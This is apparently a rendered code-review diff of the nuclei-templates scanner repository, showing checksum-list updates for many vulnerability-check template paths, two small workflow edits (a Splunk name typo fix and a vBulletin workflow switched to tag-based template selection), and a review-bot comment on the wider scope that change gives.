http/vulnerabilities/other/gsoap-lfi.yaml:aa242baa6456667473b08929ebdd2391ec263823
|
||||
http/vulnerabilities/other/gz-forum-script-xss.yaml:0766b13af3eeaf324edb042b69588a8e02d937f2
|
||||
http/vulnerabilities/other/gz-forum-script-xss.yaml:4f9e19fc198666441fc949361b7e2815bb7e3622
|
||||
http/vulnerabilities/other/h3c-cvm-arbitrary-file-upload.yaml:185ebc9353c39517c1963b7755f565f8d2b0ccbb
|
||||
http/vulnerabilities/other/h3c-imc-rce.yaml:2cbd69391843e97f2f3637a982c5ce0314b496bb
|
||||
http/vulnerabilities/other/hanming-lfr.yaml:511265b7bf1fb863ed2ae2d4d1551af5aa110a71
|
||||
|
@ -7879,6 +7915,7 @@ http/vulnerabilities/phpmyadmin-unauth.yaml:d15ef415782dbc76f48b70d10f1520819b28
|
|||
http/vulnerabilities/portainer-init-deploy.yaml:93713c9e50dea4da7a387e9be325229a914eb433
|
||||
http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml:1dde1d96626b10652831b3222e3f38f3c894fce4
|
||||
http/vulnerabilities/prestashop/prestashop-blocktestimonial-file-upload.yaml:e412881f521a4d5d350da2f825540251c38aabed
|
||||
http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml:e66d21a9fdd51c9ccc829ac69c1d63f06181d5c1
|
||||
http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml:b4125e258896dd6b614f98e0443fdba778b4ca1a
|
||||
http/vulnerabilities/qibocms-file-download.yaml:c5c1fb9a39ad1d8ac93a8163154bb2887ddf150d
|
||||
http/vulnerabilities/rails/rails6-xss.yaml:b28fc53f49e6d7a89c50a3da233570d3b05199a4
|
||||
|
@ -7934,7 +7971,7 @@ http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:03c2c45139f6ccce4cae1593fa60
|
|||
http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:7f769d37fd1e99b8c707f15123f774320cc68a9c
|
||||
http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:293e13f7aa67bd4fab36c4174f5349acfcbc737b
|
||||
http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d829a9f8df913b7baf54effb4c7193d8
|
||||
http/vulnerabilities/titan/titannit-web-ssrf.yaml:2c3d9ff9f823bbe6b104a1b23105182fab34818c
|
||||
http/vulnerabilities/titan/titannit-web-rce.yaml:af49cdd36eb61fde24289ecf35ee9e54ecb5622b
|
||||
http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:237187847805b1973d1d857e6d6d73a392456ad7
|
||||
http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c
|
||||
http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc
|
||||
|
@ -7957,6 +7994,7 @@ http/vulnerabilities/ueditor/ueditor-xss.yaml:222e1f2da270e70eb6a8c9a9b57ba955b9
|
|||
http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:3aefc2073f08e855dec0c8146b728b692ce654f2
|
||||
http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:5e3cb2ac4a3259c35592098294ad49ef31b87efe
|
||||
http/vulnerabilities/vbulletin/vbulletin-backdoor.yaml:5565f8dcc7d5ad169422fd7e698c0399f79ab961
|
||||
http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml:286dda2cca7b4e62e4c1a76eed1c5dfcf7d6495d
|
||||
http/vulnerabilities/videoxpert-lfi.yaml:1aa4c4a1048489e9343348c0e436a2917c4edcf9
|
||||
http/vulnerabilities/vmware/vmware-cloud-xss.yaml:4afa16c86c0394c6134840c2745657758b78e063
|
||||
http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:73321afec891e37709b54301889f4d0fddf26e1e
|
||||
|
@ -8077,7 +8115,7 @@ http/vulnerabilities/wordpress/w3c-total-cache-ssrf.yaml:7c640995ee7efa79791af94
|
|||
http/vulnerabilities/wordpress/watu-xss.yaml:7c2e2e4243dc0c7e95c494b365fab550869595f6
|
||||
http/vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml:20f4513cb63d35b7ad428f8cc0f409efc2c33ee2
|
||||
http/vulnerabilities/wordpress/woocommerce-pdf-invoices-xss.yaml:57027e142e6204ddd61f5110be2afd3915bcb4dd
|
||||
http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:4f7ab34ae0704143decef88cb3c65b80f19484f6
|
||||
http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml:06e5d8c96afa6b5298d67c8c9020693148b77ae0
|
||||
http/vulnerabilities/wordpress/wordpress-affiliatewp-log.yaml:7c831fd57fcfebd4d567dc1a13f8fa8fafa2b6b2
|
||||
http/vulnerabilities/wordpress/wordpress-bbpress-plugin-listing.yaml:5baba890d00daae20eb4e5f2dea36d5e1075b3a9
|
||||
http/vulnerabilities/wordpress/wordpress-db-backup-listing.yaml:d0893166dea4943ff086abbb4bdad272a134bbd0
|
||||
|
@ -8280,7 +8318,7 @@ network/backdoor/backdoored-zte.yaml:42b5ec609229045d3ebbb6e8968a1797413afb44
|
|||
network/c2/darkcomet-trojan.yaml:b8f71af056f9dfd77c24d37df301be7fba986838
|
||||
network/c2/darktrack-rat-trojan.yaml:36425c7572204441890fd6ad0336762658fbe963
|
||||
network/c2/orcus-rat-trojan.yaml:a4c141d7019f20768165f92ac5d4bfc08e8551d9
|
||||
network/c2/xtremerat-trojan.yaml:fa2fa746275c57dc51a7b0ca987f5b1c9783fc79
|
||||
network/c2/xtremerat-trojan.yaml:b2b611a36dec8a18ab75471c7a8429e6952603ca
|
||||
network/cves/2001/CVE-2001-1473.yaml:5374944a926a53026fd02e17333ab21c0fd94115
|
||||
network/cves/2011/CVE-2011-2523.yaml:439f13ea18e52af5b7de1ae93ed2de579a3157c3
|
||||
network/cves/2015/CVE-2015-3306.yaml:89bdabc177692a54c7c144c2c45446b15350f513
|
||||
|
@ -8301,7 +8339,7 @@ network/default-login/ftp-anonymous-login.yaml:0eb4d44490e80c5f5f8e7e9e7ecb1fa0c
|
|||
network/default-login/ftp-weak-credentials.yaml:c0cf4a3227435e117de922b08ad77edebf6304a5
|
||||
network/default-login/ldap-anonymous-login.yaml:1d0d2f3485fec11106c15b75166448f9ab047eec
|
||||
network/detection/activemq-openwire-transport-detect.yaml:da59945499ac1f46d9ac606f27d98dd8e1e493d9
|
||||
network/detection/aix-websm-detect.yaml:5f48d15d92ca7cffa357f5b16f8c5953e46566fe
|
||||
network/detection/aix-websm-detect.yaml:a6158ad212ce805f35b16014fdd766fdfd739e37
|
||||
network/detection/apache-activemq-detect.yaml:afd8fba85587220ae91e9120c3f7455529be8b5e
|
||||
network/detection/aws-sftp-detect.yaml:4c67b37ede734d66486377b851223abb638d1f78
|
||||
network/detection/axigen-mail-server-detect.yaml:fbf92b3b9d61df5aaf614b98b570149d62bd96ef
|
||||
|
@ -8415,15 +8453,19 @@ network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd
|
|||
network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740
|
||||
network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37
|
||||
profiles/README.md:84e7479141844434737d87eea1ab678c04d11c33
|
||||
profiles/all.yml:da115a47ed611622537dfbbe17e912010916c741
|
||||
profiles/aws-cloud-config.yml:35d9feaf76e79bf9b83a33f0f95803a8cc97a9cc
|
||||
profiles/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f
|
||||
profiles/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e
|
||||
profiles/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9
|
||||
profiles/kev.yml:4317bb80617dbbfa0921e3f2164eec962b9d6517
|
||||
profiles/cves.yml:7329a9286f8a79e7caeb008a83003d3714e3141b
|
||||
profiles/default-login.yml:4f58d7f7dcce8c8206816b835cf576a9c7af6d1a
|
||||
profiles/kev.yml:d2a9c9f9667ae3ae7564df6c766db9def45de916
|
||||
profiles/misconfigurations.yml:e755a0f2b337b1b383f027ac5265ebc2799d5e1d
|
||||
profiles/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418
|
||||
profiles/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196
|
||||
profiles/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8
|
||||
profiles/recommended.yml:fab406df5589469085f68aadf07cba513a2a20b8
|
||||
profiles/subdomain-takeovers.yml:d8f72d30ae890a9c7c63a6e43fc70e0595c312c2
|
||||
ssl/c2/asyncrat-c2.yaml:6c9515a71fd5ffb28accde9bf1b379fdd366a2fa
|
||||
ssl/c2/bitrat-c2.yaml:bf09d13d92fcc31677491ae6aab2b73c833cff91
|
||||
ssl/c2/cobalt-strike-c2.yaml:1d214f56c77fc9fa78872632dc27991220794521
|
||||
|
@ -8453,7 +8495,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
|
|||
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
|
||||
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
|
||||
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
|
||||
templates-checksum.txt:5a4967397f87a5e4bf8b4968ee500d7882ef0f51
|
||||
templates-checksum.txt:6daf0c128d534a3887b61c77158735f327eb914e
|
||||
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
|
||||
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
|
||||
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
|
||||
|
@ -8606,7 +8648,7 @@ workflows/solarwinds-orion-workflow.yaml:ec752aa58a5ac649b124965ec1f663cb9f65277
|
|||
workflows/solr-workflow.yaml:0bbd2e046f3c7c2c37ed9dcce620d0ca2bf7490a
|
||||
workflows/sonarqube-workflow.yaml:526032eea636a226a0906c69651f74cdeac5b504
|
||||
workflows/sourcebans-workflow.yaml:d20623d3701dc0cd7a563e26e5578e5f7d7abd17
|
||||
workflows/splunk-workflow.yaml:b1a747036b9b4cb038608661da200289734bedad
|
||||
workflows/splunk-workflow.yaml:1a1573714878d4c5d76a44b346850e824d17edc3
|
||||
workflows/springboot-workflow.yaml:863cfba2a94d735ab287e7d73f1c46ebaec87cfd
|
||||
workflows/squirrelmail-workflow.yaml:00c1a831d1483d8c7fb83402cbebfffe7c18feb8
|
||||
workflows/subrion-workflow.yaml:185f05da51ddb75f1d142c6f02aaa9b6f0aa73ba
|
||||
|
@ -8626,7 +8668,7 @@ workflows/tongda-workflow.yaml:eb464454bc68a4565f74036769ab5ecb1b5b1b38
|
|||
workflows/tpshop-workflow.yaml:14fc8dbc602229190c2d67273f300d9e73d1915f
|
||||
workflows/traefik-workflow.yaml:87fd8abe8f383d18739dca2ad143e873483391cf
|
||||
workflows/umbraco-workflow.yaml:b256b361df24f4b590f76aaecd23b6f6eb0be729
|
||||
workflows/vbulletin-workflow.yaml:0753e97fa927adfb90e8deaf1530e35c284a2ce2
|
||||
workflows/vbulletin-workflow.yaml:1b365ae481fe4ce3e781fd658085068bec715655
|
||||
workflows/vmware-workflow.yaml:b0438369164f8e2e741b777313d95f9039db6914
|
||||
workflows/voipmonitor-workflow.yaml:0de2f5ad087b16a7bf633884b84ce73746b0ec10
|
||||
workflows/weblogic-workflow.yaml:42703e119505c0196335b5c74c88ecff7eca128a
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
id: splunk-workflow
|
||||
|
||||
info:
|
||||
name: Splink Security Checks
|
||||
name: Splunk Security Checks
|
||||
author: daffainfo
|
||||
description: A simple workflow that runs all Splink related nuclei templates on a given target.
|
||||
description: A simple workflow that runs all Splunk related nuclei templates on a given target.
|
||||
workflows:
|
||||
- template: http/technologies/tech-detect.yaml
|
||||
matchers:
|
||||
|
|
|
@ -9,6 +9,4 @@ workflows:
|
|||
matchers:
|
||||
- name: vbulletin
|
||||
subtemplates:
|
||||
- template: http/cves/2019/CVE-2019-16759.yaml
|
||||
|
||||
- template: http/cves/2020/CVE-2020-12720.yaml
|
||||
- tags: vbulletin
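Review bot: The `- tags: vbulletin` entry under `subtemplates` selects templates by tag rather than by path, so the set of checks that run once the `vbulletin` matcher fires is no longer pinned in this workflow file. This assumes, from the `-9,6 +9,4` counts, that the tag line is the new side and the two `http/cves/...` template paths are the removed side; the rendered page has lost the `+`/`-` column. Any template that later gains the `vbulletin` tag, including intrusive ones, would then run for users of this workflow without the file itself changing. A comment above the entry would make the wider scope explicit, for example `# runs every template tagged vbulletin, not a fixed list`.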
|
||||
|
|